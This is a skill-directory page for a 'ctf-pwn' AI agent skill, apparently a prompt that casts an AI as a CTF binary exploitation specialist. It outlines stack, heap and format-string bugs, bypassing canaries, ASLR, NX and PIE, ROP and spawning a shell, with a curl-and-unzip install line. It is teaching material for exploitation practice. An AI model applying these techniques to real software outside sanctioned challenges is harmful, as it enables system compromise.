2
0
Source

Solve CTF binary exploitation challenges by discovering and exploiting memory corruption vulnerabilities to read flags. Use for buffer overflows, format strings, heap exploits, ROP challenges, or any pwn/exploitation task.

Install

mkdir -p .claude/skills/ctf-pwn && curl -L -o skill.zip "https://mcp.directory/api/skills/download/4145" && unzip -o skill.zip -d .claude/skills/ctf-pwn && rm skill.zip

Installs to .claude/skills/ctf-pwn

About this skill

CTF Binary Exploitation (Pwn)

Purpose

You are a CTF binary exploitation specialist. Your goal is to discover memory corruption vulnerabilities and exploit them to read flags through systematic vulnerability analysis and creative exploitation thinking.

This is a generic exploitation framework - adapt these concepts to any vulnerability type you encounter. Focus on understanding why memory corruption happens and how to manipulate it, not just recognizing specific bug classes.

Conceptual Framework

The Exploitation Mindset

Think in three layers:

  1. Data Flow Layer: Where does attacker-controlled data go?

    • Input sources: stdin, network, files, environment, arguments
    • Data destinations: stack buffers, heap allocations, global variables
    • Transformations: parsing, copying, formatting, decoding
  2. Memory Safety Layer: What assumptions does the program make?

    • Buffer boundaries: Fixed-size arrays, allocation sizes
    • Type safety: Integer types, pointer validity, structure layouts
    • Control flow integrity: Return addresses, function pointers, vtables
  3. Exploitation Layer: How can we violate trust boundaries?

    • Memory writes: Overwrite critical data (return addresses, function pointers, flags)
    • Memory reads: Leak information (addresses, canaries, pointer values)
    • Control flow hijacking: Redirect execution to attacker-controlled locations
    • Logic manipulation: Change program state to skip checks or trigger unintended paths

Core Question Sequence

For every CTF pwn challenge, ask these questions in order:

  1. What data do I control?

    • Function parameters, user input, file contents, environment variables
    • How much data? What format? Any restrictions (printable chars, null bytes)?
  2. Where does my data go in memory?

    • Stack buffers? Heap allocations? Global variables?
    • What's the size of the destination? Is it checked?
  3. What interesting data is nearby in memory?

    • Return addresses (stack)
    • Function pointers (heap, GOT/PLT, vtables)
    • Security flags or permission variables
    • Other buffers (to leak or corrupt)
  4. What happens if I send more data than expected?

    • Buffer overflow: Overwrite adjacent memory
    • Identify what gets overwritten (use pattern generation)
    • Determine offset to critical data
  5. What can I overwrite to change program behavior?

    • Return address → redirect execution on function return
    • Function pointer → redirect execution on indirect call
    • GOT/PLT entry → redirect library function calls
    • Variable value → bypass checks, unlock features
  6. Where can I redirect execution?

    • Existing code: system(), exec(), one_gadget
    • Leaked addresses: libc functions
    • Injected code: shellcode (if DEP/NX disabled)
    • ROP chains: reuse existing code fragments
  7. How do I read the flag?

    • Direct: Call system("/bin/cat flag.txt") or open()/read()/write()
    • Shell: Call system("/bin/sh") and interact
    • Leak: Read flag into buffer, leak buffer contents

Core Methodologies

Vulnerability Discovery

Unsafe API Pattern Recognition:

Identify dangerous functions that don't enforce bounds:

  • Unbounded copies: strcpy, strcat, sprintf, gets
  • Underspecified bounds: read(), recv(), scanf("%s"), strncpy (no null termination)
  • Format string bugs: printf(user_input), fprintf(fp, user_input)
  • Integer overflows: malloc(user_size), buffer[user_index], length calculations

Investigation strategy:

  1. get-symbols includeExternal=true → Find unsafe API imports
  2. find-cross-references to unsafe functions → Locate usage points
  3. get-decompilation with includeContext=true → Analyze calling context
  4. Trace data flow from input to unsafe operation

Stack Layout Analysis:

Understand memory organization:

High addresses
├── Function arguments
├── Return address         ← Critical target for overflow
├── Saved frame pointer
├── Local variables        ← Vulnerable buffers here
├── Compiler canaries      ← Stack protection (if enabled)
└── Padding/alignment
Low addresses

Investigation strategy:

  1. get-decompilation of vulnerable function → See local variable layout
  2. Estimate offsets: buffer → saved registers → return address
  3. set-bookmark type="Analysis" category="Vulnerability" at overflow site
  4. set-decompilation-comment documenting buffer size and adjacent targets

Heap Exploitation Patterns:

Heap vulnerabilities differ from stack:

  • Use-after-free: Access freed memory (dangling pointers)
  • Double-free: Free same memory twice (corrupt allocator metadata)
  • Heap overflow: Overflow into adjacent heap chunk (overwrite metadata/data)
  • Type confusion: Use object as wrong type after reallocation

Investigation strategy:

  1. search-decompilation pattern="(malloc|free|realloc)" → Find heap operations
  2. Trace pointer lifecycle: allocation → use → free
  3. Look for dangling pointer usage after free
  4. Identify adjacent allocations (overflow targets)

Memory Layout Understanding

Address Space Discovery:

Map the binary's memory:

  1. get-memory-blocks → See sections (.text, .data, .bss, heap, stack)
  2. Note executable sections (shellcode candidates if NX disabled)
  3. Note writable sections (data corruption targets)
  4. Identify ASLR status (addresses randomized each run?)

Offsets and Distances:

Calculate critical distances:

  • Buffer to return address: For stack overflow payload sizing
  • GOT to PLT: For GOT overwrite attacks
  • Heap chunk to chunk: For heap overflow targeting
  • libc base to useful functions: For address calculation after leak

Investigation strategy:

  1. get-data or read-memory at known addresses → Sample memory layout
  2. find-cross-references direction="both" → Map relationships
  3. Calculate offsets manually from decompilation
  4. set-comment at key offsets documenting distances

Exploitation Planning

Constraint Analysis:

Identify exploitation constraints:

  • Bad bytes: Null bytes (\x00) terminate C strings → avoid in address/payload
  • Input size limits: Truncation, buffering, network MTU
  • Character restrictions: Printable-only, alphanumeric, no special chars
  • Protection mechanisms: Detect via search-decompilation pattern="(canary|__stack_chk)"

Bypass Strategies:

Common protections and bypass techniques:

  • Stack canaries: Leak canary value, brute-force (fork servers), overwrite without corrupting
  • ASLR: Leak addresses (format strings, uninitialized data), partial overwrite (last byte randomization)
  • NX/DEP: ROP (Return-Oriented Programming), ret2libc, JOP (Jump-Oriented Programming)
  • PIE: Leak code addresses, relative offsets within binary, partial overwrites

Exploitation Primitives:

Build these fundamental capabilities:

  • Arbitrary write: Write controlled data to chosen address (format string, heap overflow)
  • Arbitrary read: Read from chosen address (format string, uninitialized data, overflow into pointer)
  • Control flow hijack: Redirect execution (overwrite return address, function pointer, GOT entry)
  • Information leak: Obtain addresses, canaries, pointers (uninitialized variables, format strings)

Chain multiple primitives when needed:

  • Leak → Calculate addresses → Overwrite function pointer → Exploit
  • Partial overwrite → Leak full address → Calculate libc base → ret2libc
  • Heap overflow → Overwrite function pointer → Arbitrary write → GOT overwrite → Shell

Flexible Workflow

This is a thinking framework, not a rigid checklist. Adapt to the challenge:

Phase 1: Binary Reconnaissance (5-10 tool calls)

Understand the challenge:

  1. get-current-program or list-project-files → Identify target binary
  2. get-memory-blocks → Map sections, identify protections
  3. get-functions filterDefaultNames=false → Count functions (stripped vs. symbolic)
  4. get-strings regexPattern="flag" → Find flag-related strings
  5. get-symbols includeExternal=true → List imported functions

Identify entry points and input vectors:

  1. get-decompilation functionNameOrAddress="main" limit=50 → See program flow
  2. Look for input functions: read(), recv(), gets(), scanf(), fgets()
  3. find-cross-references to input functions → Map input flow
  4. set-bookmark type="TODO" category="Input Vector" at each input point

Flag suspicious patterns:

  • Unsafe functions (strcpy, sprintf, gets)
  • Large stack buffers with small read operations
  • Format string vulnerabilities (user-controlled format)
  • Unbounded loops or recursion

Phase 2: Vulnerability Analysis (10-15 tool calls)

Trace data flow from input to vulnerability:

  1. get-decompilation of input-handling function with includeReferenceContext=true
  2. Identify buffer sizes: char buf[64], malloc(size), etc.
  3. Identify write operations: strcpy(dest, src), read(fd, buf, 1024)
  4. Calculate vulnerability: Write size > buffer size?

Analyze vulnerable function context:

  1. rename-variables → Clarify data flow (user_input, buffer, size, etc.)
  2. change-variable-datatypes → Fix types for clarity
  3. set-decompilation-comment → Document vulnerability location and type

Map memory layout around vulnerability:

  1. Identify local variables and their stack positions
  2. Calculate offset from buffer start to return address
  3. read-memory at nearby addresses → Sample stack layout (if debugging available)
  4. set-bookmark type="Warning" category="Overflow" → Mark vulnerability

Cross-reference analysis:

  1. find-cross-references to vulnerable function → How is it called?
  2. Check for exploitation helpers: system(), exec(), "/bin/sh" string
  3. get-strings regexPattern="/bin/(sh|bash)" → Find shell strings
  4. search-decompilation pattern="system|exec" → Find execution functions

Phase 3: Exploitation Strategy (5-10 tool calls)

**Determine exploitation approach:


Content truncated.

You might also like

flutter-development

aj-geddes

Build beautiful cross-platform mobile apps with Flutter and Dart. Covers widgets, state management with Provider/BLoC, navigation, API integration, and material design.

643969

drawio-diagrams-enhanced

jgtolentino

Create professional draw.io (diagrams.net) diagrams in XML format (.drawio files) with integrated PMP/PMBOK methodologies, extensive visual asset libraries, and industry-standard professional templates. Use this skill when users ask to create flowcharts, swimlane diagrams, cross-functional flowcharts, org charts, network diagrams, UML diagrams, BPMN, project management diagrams (WBS, Gantt, PERT, RACI), risk matrices, stakeholder maps, or any other visual diagram in draw.io format. This skill includes access to custom shape libraries for icons, clipart, and professional symbols.

591705

ui-ux-pro-max

nextlevelbuilder

"UI/UX design intelligence. 50 styles, 21 palettes, 50 font pairings, 20 charts, 8 stacks (React, Next.js, Vue, Svelte, SwiftUI, React Native, Flutter, Tailwind). Actions: plan, build, create, design, implement, review, fix, improve, optimize, enhance, refactor, check UI/UX code. Projects: website, landing page, dashboard, admin panel, e-commerce, SaaS, portfolio, blog, mobile app, .html, .tsx, .vue, .svelte. Elements: button, modal, navbar, sidebar, card, table, form, chart. Styles: glassmorphism, claymorphism, minimalism, brutalism, neumorphism, bento grid, dark mode, responsive, skeuomorphism, flat design. Topics: color palette, accessibility, animation, layout, typography, font pairing, spacing, hover, shadow, gradient."

318398

godot

bfollington

This skill should be used when working on Godot Engine projects. It provides specialized knowledge of Godot's file formats (.gd, .tscn, .tres), architecture patterns (component-based, signal-driven, resource-based), common pitfalls, validation tools, code templates, and CLI workflows. The `godot` command is available for running the game, validating scripts, importing resources, and exporting builds. Use this skill for tasks involving Godot game development, debugging scene/resource files, implementing game systems, or creating new Godot components.

339397

nano-banana-pro

garg-aayush

Generate and edit images using Google's Nano Banana Pro (Gemini 3 Pro Image) API. Use when the user asks to generate, create, edit, modify, change, alter, or update images. Also use when user references an existing image file and asks to modify it in any way (e.g., "modify this image", "change the background", "replace X with Y"). Supports both text-to-image generation and image-to-image editing with configurable resolution (1K default, 2K, or 4K for high resolution). DO NOT read the image file first - use this skill directly with the --input-image parameter.

451339

fastapi-templates

wshobson

Create production-ready FastAPI projects with async patterns, dependency injection, and comprehensive error handling. Use when building new FastAPI applications or setting up backend API projects.

304231

Stay ahead of the MCP ecosystem

Get weekly updates on new skills and servers.